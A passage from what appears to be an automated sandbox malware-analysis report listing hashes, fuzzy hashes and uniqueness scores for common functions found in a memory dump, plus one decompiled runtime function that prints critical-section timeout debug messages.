Instruction ID: b0b5696032d52ba372a72cc7e245e201dd8c684be47327e9fb816b1b2d9f5329
Opcode Fuzzy Hash: f49f97b924f36b0f459c15af3921bf64fe72b5718b74fff46fbb2de94f56cbb4
Instruction Fuzzy Hash: 76E0DFB2A0D2069FD73FDB69D081F297B989F52625F1A801DF0084B582C7A2D883C287

Uniqueness

Uniqueness Score: -1.00%

Function 011841E8, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 816475ea3c7aad20459532088f2bd372ba1d9ef9b47796f2a7cc562ddd3dc4be
Instruction ID: 2a3a13348dac92247b49a39de1e66d9f6029c3df558ad6f10549479c78cdf2c2
Opcode Fuzzy Hash: 816475ea3c7aad20459532088f2bd372ba1d9ef9b47796f2a7cc562ddd3dc4be
Instruction Fuzzy Hash: A2F0FB78CA1B028FCBA9EBE9A60470836F4F764724F00812EA1209B6C8CB7454E5CF01

Uniqueness

Uniqueness Score: -1.00%

Function 011AD380, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 0a7df9ded25baadece529261c3d793a048f22aa51ef3523da2a706c1fd2cd5e2
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 6FE0C235284A05BBDF266E84DC00FA9BB16DF507A0F114031FE089ABA0C7719C91D6C4

Uniqueness

Uniqueness Score: -1.00%

Function 0112A185, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b53fd818ba57883e80be41b3f4d01aa8512570d7a0dd24fa7c3f077610829e3
Instruction ID: b9f7afaea55af3cd4da59d236322bdc77c4dd73a2bcef43a551cbb7d6139c8f9
Opcode Fuzzy Hash: 5b53fd818ba57883e80be41b3f4d01aa8512570d7a0dd24fa7c3f077610829e3
Instruction Fuzzy Hash: FED02B615608001AC72D5380AE3CB213293FBA4770F74881CF2030BD94FB60C8E0C108

Uniqueness

Uniqueness Score: -1.00%

Function 011216E0, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4e56b8ab99f3a97ebcfea3f095070876e6d5b21649d831a6803f4e85b964184
Instruction ID: 6c538a5c9a8c56774c092eb4f0380b5923d783b47f10db32ca72a9d02bf0de18
Opcode Fuzzy Hash: e4e56b8ab99f3a97ebcfea3f095070876e6d5b21649d831a6803f4e85b964184
Instruction Fuzzy Hash: 23D0A771140501B3EA3D9B149C04B193652EBD0B89F78006CF207598C0CFE4CCB2E048

Uniqueness

Uniqueness Score: -1.00%

Function 011753CA, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 818a083bf1f34f49f157b814b0043940ad4ddf0c1003a1ad75667b59c971cdde
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 7DE08C31944A809BDF1BEB59C650F4EBBF6FB44B00F180414A0085B7B0C774AC00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0110AAB0, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 9406d8a136ec462506dca0053c4e949d91c0dce68d709315d7729cf4837543e0
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 5CD0E935352A80CFD75BCB5DD554B1577A4BF44B44FC50590E901CB762E76CD984CA00

Uniqueness

Uniqueness Score: -1.00%

Function 011235A1, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: c41bf6e6a2a868c2ea42f91d95181df9b0c45294504bda10674e47909c7f452d
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 66D0A9318621919AEB0EAB14C2187683BB3BB08208F582065C05A0689AE33E4A2ACE01

Uniqueness

Uniqueness Score: -1.00%

Function 010FDB40, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: f07bde05a7e03a3bdf1c8ac62399bff983598b78bb6aa0f9aa7a95f6c21021cb
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 26C08C70280A01EAEB261F20CD02F007AA1BB10F09F4804A06300DA8F4DB78D801E600

Uniqueness

Uniqueness Score: -1.00%

Function 0117A537, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 40e9796beb1bb7bdb1331d3c9901f520e7dd0c71afb1d99b13740b1e47dab9ae
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: E5C08C33180248BBCB126F81CC00F46BF2AFBA4B60F008020FA080B570C632E970EB84

Uniqueness

Uniqueness Score: -1.00%

Function 01113A1C, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: ad8a7be901a3c4dee93c25d051a48198e16fa996015e257d81ce0502cc295778
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 6BC08C32080248BBC7126E41DC00F01BB2AE7A0B60F000020B6040A9608632EC60D588

Uniqueness

Uniqueness Score: -1.00%

Function 010FAD30, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 88b4d1b2c3a562405818950470b2200e4ec3c8ee1e9d3ef8dc02ea96af8dad07
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 77C08C32080648BBC7126A45CD00F01BB29E7A0B60F000020F6040A6A18A32E860D588

Uniqueness

Uniqueness Score: -1.00%

Function 011236CC, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: b9edfe9ef6fce5c5d275464cae8e2676f85a94d7d6f919bb4634f795710aa543
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 18C02BB0160440FBD72D1F30CD00F14B258F700F25F640764B230458F0D72C9C00D100

Uniqueness

Uniqueness Score: -1.00%

Function 011076E2, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 54355c1b208c9c89d41f67ec6a9f86c990c8adb073443145e15e07aa756e3510
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: C7C08C706415805AFB2F570CCE24B203A50AB08608F8801ACEA82095E2C3A8B802C208

Uniqueness

Uniqueness Score: -1.00%

Function 01117D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 190c163edf604cd6760d595efd13d726906333b3fb6e2fa8a76a3816135b98a4
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: D9B092353019408FCE1ADF18C080B1973F4BB48A40B8440E0E400CBA21D329E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 01122ACB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 0105582c57b29f6d9fbf306e65a93de77fc0cc422a5d26cbc826d93f9c231f6c
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: F3B01232C51841CFCF07FF40C610B197331FB00750F094890900127970C328AC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01139950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d77f2efe2105e633b3e2fa07a81a9366ae8ba7b5f7903d592eb24d6202fb0f62
Instruction ID: a62d6f53d8510c3093059ce312e62b63b70e4a69e4fadca3ef7ae77c51100f4f
Opcode Fuzzy Hash: d77f2efe2105e633b3e2fa07a81a9366ae8ba7b5f7903d592eb24d6202fb0f62
Instruction Fuzzy Hash: 139002B130140403D944659959046070005A7E0752F51C015A2055595ECB698C517179

Uniqueness

Uniqueness Score: -1.00%

Function 011399D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e0e097f57526717d1fb4e7f68c4ebfa34a02589a3897300048a6f15726e2293
Instruction ID: 7443b6599497c06cd699fe7b437726608eeaeef50cbffaee939ac86856e62b4f
Opcode Fuzzy Hash: 9e0e097f57526717d1fb4e7f68c4ebfa34a02589a3897300048a6f15726e2293
Instruction Fuzzy Hash: A99002B131100043D908619955047060045A7F1651F51C016A2145594CC6698C616169

Uniqueness

Uniqueness Score: -1.00%

Function 01139820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c77d506ac89536f18b6f0110335768204693ad6a79cacbb5f3af858959505dfc
Instruction ID: d9294228d6f4782799c96b0d6ec3308b286f98e4a7c6b4a59d56b0bd5e48094d
Opcode Fuzzy Hash: c77d506ac89536f18b6f0110335768204693ad6a79cacbb5f3af858959505dfc
Instruction Fuzzy Hash: EC90027134100403D945719955046060009B7E0691F91C016A0415594EC7958A56BAA5

Uniqueness

Uniqueness Score: -1.00%

Function 0113B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edc533a2ab36dcf69dc94927aa455c359ff366f6fdee1a6bf67970a23f759d1e
Instruction ID: 7feb70be1bad611ec6b2089dc99840b4187177127805f3a07fff8801ededc47c
Opcode Fuzzy Hash: edc533a2ab36dcf69dc94927aa455c359ff366f6fdee1a6bf67970a23f759d1e
Instruction Fuzzy Hash: AA9002B1701140434D44B19959044065015B7F1751391C125A04455A0CC7A88855A2A9

Uniqueness

Uniqueness Score: -1.00%

Function 011398A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb7a6fc8aa74d336072334bbba62f2dd4a97f6ad06756c328861647726e676a2
Instruction ID: 16b2d1471c2b9b65c00e80cf1274192c990b23da4d383530d43822449c77d5fe
Opcode Fuzzy Hash: bb7a6fc8aa74d336072334bbba62f2dd4a97f6ad06756c328861647726e676a2
Instruction Fuzzy Hash: 4890027130100403D906619955146060009E7E1795F91C016E1415595DC7658953B176

Uniqueness

Uniqueness Score: -1.00%

Function 01139B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ef7af04bfce6a1f2353446b835571dfe158d470998b723d00ff86cf9044c2b8
Instruction ID: 3e0c696e8a4621312c70f39e9aedadba90dca6839b0718d47f589b49c24fbcd1
Opcode Fuzzy Hash: 6ef7af04bfce6a1f2353446b835571dfe158d470998b723d00ff86cf9044c2b8
Instruction Fuzzy Hash: A490027134100803D944719995147070006E7E0A51F51C015A0015594DC756896576F5

Uniqueness

Uniqueness Score: -1.00%

Function 0113A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cec68100fe8a2c8e18ceee8874c190a85cf9c3f636268d34ea6aaa932fade51
Instruction ID: b748a298e8cb6280e9fb7e333aedf64ea353aa1cd5143e157cfd2e4e6bc0798b
Opcode Fuzzy Hash: 2cec68100fe8a2c8e18ceee8874c190a85cf9c3f636268d34ea6aaa932fade51
Instruction Fuzzy Hash: E590027130144003D9447199954460B5005B7F0751F51C415E0416594CC7558856A265

Uniqueness

Uniqueness Score: -1.00%

Function 01139A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1ac005aa7d3fa41d740b330c4faabf4f20946fb2cf8bb3fe4fca8500edb3a15
Instruction ID: b53d0e7946685ef1a8b169e9502bf66a41ae5dbf871b9102c4d36c6f53414363
Opcode Fuzzy Hash: f1ac005aa7d3fa41d740b330c4faabf4f20946fb2cf8bb3fe4fca8500edb3a15
Instruction Fuzzy Hash: 5B90027130140403D904619959087470005A7E0752F51C015A5155595EC7A5C8917575

Uniqueness

Uniqueness Score: -1.00%

Function 01139A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 534213aadf52ed42be543586b789321f739d4fe52e3101e037024124bacedff3
Instruction ID: 3fae74d705a2c2ee80c996cd8a4462441823f85215c8c2adb90267480a5a79b8
Opcode Fuzzy Hash: 534213aadf52ed42be543586b789321f739d4fe52e3101e037024124bacedff3
Instruction Fuzzy Hash: 8390027130144443D94462995904B0F4105A7F1652F91C01DA4147594CCA5588556765

Uniqueness

Uniqueness Score: -1.00%

Function 0113AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0b099d789ad971cd085cb863b173555b5de875856c579df16b7b641cd99c499
Instruction ID: c544de28e729681870494340a2620cdd559a2c37dbff1eb17953ca99ebc2388f
Opcode Fuzzy Hash: f0b099d789ad971cd085cb863b173555b5de875856c579df16b7b641cd99c499
Instruction Fuzzy Hash: A9900271B05000139944719959146464006B7F0B91B55C015A0505594CCA948A5563E5

Uniqueness

Uniqueness Score: -1.00%

Function 01139520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e50a4e6a1371f6efcd68e14562f63489783957b249a94eaaef691b78389e945
Instruction ID: b31dd4e9aba1dcef8796bfa8ede6e23882143678d8f303e9feb5c6b9d3cce181
Opcode Fuzzy Hash: 3e50a4e6a1371f6efcd68e14562f63489783957b249a94eaaef691b78389e945
Instruction Fuzzy Hash: C79002F1301140934D04A2999504B0A4505A7F0651B51C01AE10455A0CC6658851A179

Uniqueness

Uniqueness Score: -1.00%

Function 01139560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 635296f1965933536f61d973a0a6d3d15ada04fa4a1d1245bf11bf6fd0720709
Instruction ID: 5f0a0d918d776d2103143339fae4198131623e233ede6e55b80a51a99068a614
Opcode Fuzzy Hash: 635296f1965933536f61d973a0a6d3d15ada04fa4a1d1245bf11bf6fd0720709
Instruction Fuzzy Hash: 81900275321000030949A599170450B0445B7E67A1391C019F14075D0CC76188656365

Uniqueness

Uniqueness Score: -1.00%

Function 011395F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5383db5c5d80a3631ea5021569f9226aa38026ab47c1675ca3f56f091bf5e7a
Instruction ID: 4e3fe5311a9b9bae42a6898513e139ef042533b2cb3733ec719ad42b801a344e
Opcode Fuzzy Hash: f5383db5c5d80a3631ea5021569f9226aa38026ab47c1675ca3f56f091bf5e7a
Instruction Fuzzy Hash: 9B90027130100803D908619959046860005A7E0751F51C015A6015695ED7A588917175

Uniqueness

Uniqueness Score: -1.00%

Function 0113A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b71a3086727c31d79e3a635b90198a924031514e7e1f76cbc42206908010fb7e
Instruction ID: f8f5711af4c348467552a2662f9184818521a46e2b6f436533e1947305db6143
Opcode Fuzzy Hash: b71a3086727c31d79e3a635b90198a924031514e7e1f76cbc42206908010fb7e
Instruction Fuzzy Hash: A7900271301000539D04A6D96904A4A4105A7F0751B51D019A4005594CC69488616165

Uniqueness

Uniqueness Score: -1.00%

Function 01139730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd32fec5df5378878bfc44d803cca5d9c4298fc8313c8ea1577bd7d05982c68
Instruction ID: c14e8ed48bc8a6fe7a9899ef658dba7b5e9d9b972b498f54d56aeb7f432ed91d
Opcode Fuzzy Hash: 8cd32fec5df5378878bfc44d803cca5d9c4298fc8313c8ea1577bd7d05982c68
Instruction Fuzzy Hash: 1690027170500403D944719965187060015A7E0651F51D015A0015594DC7998A5576E5

Uniqueness

Uniqueness Score: -1.00%

Function 0113A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4c2842a51add8b31cf7064c8f10fd859ece3fdf218b8295c17ab9543b991632
Instruction ID: 943642203c455ef3a4f7b265aeebe6e8074f116a80d489f5dde38113e952d0de
Opcode Fuzzy Hash: a4c2842a51add8b31cf7064c8f10fd859ece3fdf218b8295c17ab9543b991632
Instruction Fuzzy Hash: 0A90027530504443DD0465996904A870005A7E0755F51D415A04155DCDC7948861B165

Uniqueness

Uniqueness Score: -1.00%

Function 01139770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a8b4d3c31aadfa987a3a71ebd0984fe72074a1959358a9f517abbffd0f80cd9
Instruction ID: 7bc1dacb0c231e5aaa39841c596ccc08b0d2cb4abe733bd5568bb6a077c9ed83
Opcode Fuzzy Hash: 5a8b4d3c31aadfa987a3a71ebd0984fe72074a1959358a9f517abbffd0f80cd9
Instruction Fuzzy Hash: 6390027130504443D90465996508A060005A7E0655F51D015A10555D5DC7758851B175

Uniqueness

Uniqueness Score: -1.00%

Function 01139760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3b6affbae3e0810f74394ee1206e49c7862ddd0e3aaae0efe71f2b5c2b293fa
Instruction ID: 6237754dea581b9b9737de034837eb3bb913072752c1ae3b9e3638089041c556
Opcode Fuzzy Hash: e3b6affbae3e0810f74394ee1206e49c7862ddd0e3aaae0efe71f2b5c2b293fa
Instruction Fuzzy Hash: 7790027130100403D904619966087070005A7E0651F51D415A0415598DD79688517165

Uniqueness

Uniqueness Score: -1.00%

Function 01139FE0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cc1172fd9b05ae6fa70dcd21367c0b61a007c7af75204c76ac303ba898f3317
Instruction ID: 857bc55444fd81d3087c47322ccc90318cb7091e3d041fbb9c31ff75d98bfc41
Opcode Fuzzy Hash: 7cc1172fd9b05ae6fa70dcd21367c0b61a007c7af75204c76ac303ba898f3317
Instruction Fuzzy Hash: 7B90027131114403D914619995047060005A7E1651F51C415A0815598DC7D588917166

Uniqueness

Uniqueness Score: -1.00%

Function 01139610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 595f30a9955bdfba24df344d6d2eea40d35b15d3902f841e3eca6248f58591e1
Instruction ID: 8f1bcad4f24126977a583c395a5a52a1985a32e8a65dbb821d8ef39f8eb13325
Opcode Fuzzy Hash: 595f30a9955bdfba24df344d6d2eea40d35b15d3902f841e3eca6248f58591e1
Instruction Fuzzy Hash: 0990027170500803D954719955147460005A7E0751F51C015A0015694DC7958A5576E5

Uniqueness

Uniqueness Score: -1.00%

Function 01139650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 912c634f92d44e7cb30ed3fa8e57e9f193cdcca607b72357e2fd6e9ee8e5fd4e
Instruction ID: d26a7465d3c6a4d89a3f85d30020687a8e906d7c0ab0e967b42e9663cd28b9cc
Opcode Fuzzy Hash: 912c634f92d44e7cb30ed3fa8e57e9f193cdcca607b72357e2fd6e9ee8e5fd4e
Instruction Fuzzy Hash: D790027130504843D94471995504A460015A7E0755F51C015A00556D4DD7658D55B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 011396D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbcf10c7564e6668df13e90ee59e630ca03a2edb2d4b79219bfc632dccec7f51
Instruction ID: f81c8848084df617ace8a602076cb5a81df46b86c675494b37413695dc16f5db
Opcode Fuzzy Hash: bbcf10c7564e6668df13e90ee59e630ca03a2edb2d4b79219bfc632dccec7f51
Instruction Fuzzy Hash: A190027130100843D90461995504B460005A7F0751F51C01AA0115694DC755C8517565

Uniqueness

Uniqueness Score: -1.00%

Function 01139670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 2752a280479a82980bc5a40999ce862cadb03e9ad9b16afd29b25434351c276a
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0118FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0118FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0113CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01185720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01185720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0118fdda
0x0118fde2
0x0118fde5
0x0118fdec
0x0118fdfa
0x0118fdff
0x0118fe0a
0x0118fe0f
0x0118fe17
0x0118fe1e
0x0118fe19
0x0118fe19
0x0118fe19
0x0118fe20
0x0118fe21
0x0118fe22
0x0118fe25
0x0118fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0118FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0118FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0118FE01

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: e2b2c89bc2014b3467e84a41d8ba2ff1bb085cfb004f290848ab057f7e37f466
Instruction ID: d8d5e9d6ada17add073b576901c79600c4b7c46a0044c55ffe63ada201f2b5e6
Opcode Fuzzy Hash: e2b2c89bc2014b3467e84a41d8ba2ff1bb085cfb004f290848ab057f7e37f466
